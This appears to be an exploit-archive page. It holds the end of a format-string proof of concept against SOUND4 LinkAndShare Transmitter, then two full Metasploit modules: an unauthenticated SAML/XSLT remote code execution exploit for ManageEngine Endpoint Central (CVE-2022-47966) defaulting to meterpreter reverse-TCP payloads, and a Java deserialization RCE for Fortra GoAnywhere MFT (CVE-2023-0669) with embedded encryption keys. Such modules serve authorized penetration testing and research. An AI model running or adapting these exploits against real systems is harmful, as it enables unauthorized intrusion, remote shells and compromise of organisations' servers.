29h<br /><br /><br />---<br /><br /><br />C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>set username=%a.%b.%c.%d.%e.%f.%g.%h.%x.AAAAAAAAAAAAAA.%x.BBBAAAAAAAA=%p=AAAAA.%xAAAAA<br />C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>LinkAndShareTransmitter.exe<br /><br />C:\Program Files (x86)\SOUND4\LinkAndShare\Transmitter>02/02/23 17:11:44 : : Internal Error: can not replace file with temp file<br />02/02/23 17:11:44 : Background launch: User: 0x1.7474b0p-1019.b.<br />.1897752.3.147818e+267.1445459053534108500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000.000000.1.36157e+267..0.AAAAAAAAAAAAAA.1cf784.BBBAAAAAAAA=7770C59F=AAAAA.47c778AAAAA<br /></code></pre>
<pre><code># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /><br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'ManageEngine Endpoint Central Unauthenticated SAML RCE',<br /> 'Description' => %q{<br /> This exploits an unauthenticated remote code execution vulnerability<br /> that affects Zoho ManageEngine Endpoint Central and MSP versions 10.1.2228.10<br /> and below (CVE-2022-47966). Due to a dependency to an outdated library<br /> (Apache Santuario version 1.4.1), it is possible to execute arbitrary<br /> code by providing a crafted `samlResponse` XML to the Endpoint Central<br /> SAML endpoint. Note that the target is only vulnerable if it is<br /> configured with SAML-based SSO , and the service should be active.<br /> },<br /> 'Author' => [<br /> 'Khoa Dinh', # Original research<br /> 'horizon3ai', # PoC<br /> 'Christophe De La Fuente', # Based on the original code of the ServiceDesk Plus Metasploit module<br /> 'h00die-gr3y <h00die.gr3y[at]gmail.com>' # Added some small tweaks to the original code of Christophe to make it work for this target<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> ['CVE', '2022-47966'],<br /> ['URL', 'https://blog.viettelcybersecurity.com/saml-show-stopper/'],<br /> ['URL', 'https://www.horizon3.ai/manageengine-cve-2022-47966-technical-deep-dive/'],<br /> ['URL', 'https://github.com/horizon3ai/CVE-2022-47966'],<br /> ['URL', 'https://attackerkb.com/topics/gvs0Gv8BID/cve-2022-47966/rapid7-analysis']<br /> ],<br /> 'Platform' => [ 'win' ],<br /> 'Payload' => {<br /> 'BadChars' => "\x27"<br /> },<br /> 'Targets' => [<br /> [<br /> 'Windows EXE Dropper',<br /> {<br /> 'Platform' => 'win',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :windows_dropper,<br /> 'DefaultOptions' => { 'Payload' => 'windows/x64/meterpreter/reverse_tcp' }<br /> }<br /> ],<br /> [<br /> 'Windows Command',<br /> {<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :windows_command,<br /> 'DefaultOptions' => { 'Payload' => 'cmd/windows/powershell/meterpreter/reverse_tcp' }<br /> }<br /> ]<br /> ],<br /> 'DefaultOptions' => {<br /> 'RPORT' => 8443,<br /> 'SSL' => true<br /> },<br /> 'DefaultTarget' => 1,<br /> 'DisclosureDate' => '2023-01-10',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE,],<br /> 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],<br /> 'Reliability' => [REPEATABLE_SESSION]<br /> },<br /> 'Privileged' => true<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('TARGETURI', [ true, 'The SAML endpoint URL', '/SamlResponseServlet' ]),<br /> OptInt.new('DELAY', [ true, 'Number of seconds to wait between each request', 5 ])<br /> ])<br /> end<br /><br /> def check_saml_enabled<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri('/SamlRequestServlet')<br /> })<br /> if res.nil?<br /> print_error('No response from target.')<br /> return false<br /> end<br /><br /> # ManageEngine Endpoint Servers with SAML enabled respond with 302 and a HTTP header Location: containing the SAML request<br /> if res && res.code == 302 && res.headers['Location'].include?('SAMLRequest=')<br /> return true<br /> else<br /> return false<br /> end<br /> end<br /><br /> def check<br /> # check if SAML-based SSO is enabled otherwise exploit will fail<br /> # No additional fingerprint / banner information available to collect and determine version<br /> return Exploit::CheckCode::Safe unless check_saml_enabled<br /><br /> CheckCode::Detected('SAML-based SSO is enabled.')<br /> end<br /><br /> def encode_begin(real_payload, reqs)<br /> super<br /><br /> reqs['EncapsulationRoutine'] = proc do |_reqs, raw|<br /> raw.start_with?('powershell') ? raw.gsub('$', '`$') : raw<br /> end<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> case target['Type']<br /> when :windows_command<br /> execute_command(payload.encoded)<br /> when :windows_dropper<br /> execute_cmdstager(delay: datastore['DELAY'])<br /> end<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> if target['Type'] == :windows_dropper<br /> cmd = "cmd /c #{cmd}"<br /> end<br /> cmd = cmd.encode(xml: :attr).gsub('"', '')<br /><br /> assertion_id = "_#{SecureRandom.uuid}"<br /> # Randomize variable names and make sure they are all different using a Set<br /> vars = Set.new<br /> loop do<br /> vars << Rex::Text.rand_text_alpha_lower(5..8)<br /> break unless vars.size < 3<br /> end<br /> vars = vars.to_a<br /> saml = <<~EOS<br /> <?xml version="1.0" encoding="UTF-8"?><br /> <samlp:Response<br /> ID="_#{SecureRandom.uuid}"<br /> InResponseTo="_#{Rex::Text.rand_text_hex(32)}"<br /> IssueInstant="#{Time.now.iso8601}" Version="2.0" xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"><br /> <samlp:Status><br /> <samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"/><br /> </samlp:Status><br /> <Assertion ID="#{assertion_id}"<br /> IssueInstant="#{Time.now.iso8601}" Version="2.0" xmlns="urn:oasis:names:tc:SAML:2.0:assertion"><br /> <Issuer>#{Rex::Text.rand_text_alphanumeric(3..10)}</Issuer><br /> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><br /> <ds:SignedInfo><br /> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/><br /> <ds:SignatureMethod Algorithm="http://www.w3.org/2001/04/xmldsig-more#rsa-sha256"/><br /> <ds:Reference URI="##{assertion_id}"><br /> <ds:Transforms><br /> <ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/><br /> <ds:Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116"><br /> <xsl:stylesheet version="1.0"<br /> xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"<br /> xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><br /> <xsl:template match="/"><br /> <xsl:variable name="#{vars[0]}" select="rt:getRuntime()"/><br /> <xsl:variable name="#{vars[1]}" select="rt:exec($#{vars[0]},'#{cmd}')"/><br /> <xsl:variable name="#{vars[2]}" select="ob:toString($#{vars[1]})"/><br /> <xsl:value-of select="$#{vars[2]}"/><br /> </xsl:template><br /> </xsl:stylesheet><br /> </ds:Transform><br /> </ds:Transforms><br /> <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/><br /> <ds:DigestValue>#{Rex::Text.encode_base64(SecureRandom.random_bytes(32))}</ds:DigestValue><br /> </ds:Reference><br /> </ds:SignedInfo><br /> <ds:SignatureValue>#{Rex::Text.encode_base64(SecureRandom.random_bytes(rand(128..256)))}</ds:SignatureValue><br /> <ds:KeyInfo/><br /> </ds:Signature><br /> </Assertion><br /> </samlp:Response><br /> EOS<br /><br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(datastore['TARGETURI']),<br /> 'vars_post' => {<br /> 'SAMLResponse' => Rex::Text.encode_base64(saml)<br /> }<br /> })<br /><br /> unless res&.code == 200<br /> lines = res.get_html_document.xpath('//body').text.lines.reject { |l| l.strip.empty? }.map(&:strip)<br /> unless lines.any? { |l| l.include?('URL blocked as maximum access limit for the page is exceeded') }<br /> elog("Unkown error returned:\n#{lines.join("\n")}")<br /> fail_with(Failure::Unknown, "Unknown error returned (HTTP code: #{res&.code}). See logs for details.")<br /> end<br /> fail_with(Failure::NoAccess, 'Maximum access limit exceeded (wait at least 1 minute and increase the DELAY option value)')<br /> end<br /><br /> res<br /> end<br /><br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /><br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::JavaDeserialization<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Fortra GoAnywhere MFT Unsafe Deserialization RCE',<br /> 'Description' => %q{<br /> This module exploits CVE-2023-0669, which is an object deserialization<br /> vulnerability in Fortra GoAnywhere MFT.<br /> },<br /> 'Author' => [<br /> 'Ron Bowes', # Analysis and module<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-0669'],<br /> ['URL', 'https://attackerkb.com/topics/mg883Nbeva/cve-2023-0669/rapid7-analysis'],<br /> ],<br /> 'DisclosureDate' => '2023-02-01',<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => ['unix', 'win'],<br /> 'Arch' => [ARCH_CMD],<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'Version 2 Encryption',<br /> {<br /> 'DefaultOptions' => {<br /> 'Version' => '$2',<br /> 'EncryptionKey' => '0e69a3839b6ecf45649b861f4a27171b66870c9567a4144ebaf3d52fdc4064ca',<br /> 'EncryptionIv' => '4145532f4342432f504b435335506164'<br /> }<br /> },<br /> ],<br /> [<br /> 'Version 1 Encryption',<br /> {<br /> 'DefaultOptions' => {<br /> 'Version' => '',<br /> 'EncryptionKey' => '678b5830bf8b8a2e0474b97d6cd18e845fbc4b11fca0d6af2db1eb114c29fc4b',<br /> 'EncryptionIv' => '4145532f4342432f504b435335506164'<br /> }<br /> }<br /> ],<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 8001,<br /> 'SSL' => true<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('TARGETURI', [true, 'Unsafe deserialization endpoint', '/goanywhere/lic/accept']),<br /> ])<br /><br /> register_advanced_options([<br /> OptString.new('Version', [false, 'A version value to append to the encrypted data']),<br /> OptString.new('EncryptionKey', [true, 'The encryption key to use (hex-encoded)'], regex: /^([a-fA-F0-9]{2})+$/),<br /> OptString.new('EncryptionIv', [true, 'The initialization vector (hex-encoded)'], regex: /^([a-fA-F0-9]{2})+$/),<br /> OptString.new('EncryptionAlgorithm', [true, 'The encryption algorithm', 'AES-256-CBC'])<br /> ])<br /> end<br /><br /> def build_cipher<br /> unless OpenSSL::Cipher.ciphers.any? { |cipher_name| cipher_name.casecmp?(datastore['EncryptionAlgorithm']) }<br /> raise Msf::OptionValidateError.new({ 'EncryptionAlgorithm' => 'The selected encryption algorithm is not supported by OpenSSL.' })<br /> end<br /><br /> cipher = OpenSSL::Cipher.new(datastore['EncryptionAlgorithm'])<br /> cipher.encrypt<br /><br /> option_errors = {}<br /> iv = datastore['EncryptionIv'].scan(/../).map { |x| x.hex.chr }.join<br /> unless cipher.iv_len == iv.length<br /> option_errors['EncryptionIv'] = "The encryption IV is not the correct length (is: #{iv.length}, should be: #{cipher.iv_len})."<br /> end<br /><br /> key = datastore['EncryptionKey'].scan(/../).map { |x| x.hex.chr }.join<br /> unless cipher.key_len == key.length<br /> option_errors['EncryptionKey'] = "The encryption key is not the correct length (is: #{key.length}, should be: #{cipher.key_len})."<br /> end<br /> raise Msf::OptionValidateError, option_errors unless option_errors.empty?<br /><br /> cipher.iv = iv<br /> cipher.key = key<br /> cipher<br /> end<br /><br /> def exploit<br /> vprint_status('Generating a serialized Java object with the payload')<br /> obj = generate_java_deserialization_for_payload('CommonsBeanutils1', payload)<br /><br /> vprint_status('Encrypting the payload')<br /> cipher = build_cipher<br /> obj = cipher.update(obj) + cipher.final<br /><br /> vprint_status('Sending request to the server')<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => datastore['TARGETURI'],<br /> 'vars_post' => {<br /> 'bundle' => "#{Base64.urlsafe_encode64(obj)}#{datastore['Version'] || ''}"<br /> }<br /> )<br /><br /> fail_with(Failure::Unreachable, 'No response received from the target.') unless res<br /> if res.code != 500<br /> fail_with(Failure::UnexpectedReply, "Expected the server to return HTTP/500, instead received HTTP/#{res.code}")<br /> end<br /> end<br />end<br /></code></pre>
Archives
Categories
- All Exploits 4105
- Remote Code Execution
- SQL Injection
- Command Injection
- Local File Inclusion
- Cross Site Scripting
- Privilege Escalation
- Denial Of Service
- Authentication Bypass
- Buffer Overflow